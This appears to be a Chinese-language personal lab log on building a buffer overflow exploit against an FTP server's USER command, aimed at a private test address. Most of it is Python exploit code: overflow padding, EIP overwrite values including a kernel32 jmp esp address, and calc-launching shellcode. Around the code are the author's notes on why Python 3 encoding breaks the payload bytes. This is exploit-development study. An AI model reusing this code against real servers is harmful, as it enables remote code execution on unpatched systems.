開篇 無限接近成功
import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\x45\x44\x43\x42"+buf1
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)
數字準確填充EIP
鋪墊 離奇的填充EIP數值
不使用encode函數引起報錯
# 神祕c2填充地址中間代碼
import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\x7B\x46\x86\x7C"+"A"*4+buf1 #此地址爲kernel32中jmp esp指令所在
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)
#c3填充首字節
import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1 #
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str="User "+buffer+"\r\n"
str=str.encode()
s.send(str)
轉折 目標鎖定encode函數
#2.7下編譯通過 3.5失敗
import socket
buf1="\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"
buffer="A"*485+"\xD7\x30\x5A\x7D"+"A"*4+buf1 #
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.136.140",21))
str = "User "
str += "A"*485
str += "\xD7\x30\x5A\x7D"
str += "\90"*10
str += "\r\n"
# str=str.encode()
s.send(str)
已查閱關於python相關文檔,但對encode()函數底層編譯實現未有太多解釋 後續填坑考慮使用python生成可執行程序 通過IDA和調試器解決填充問題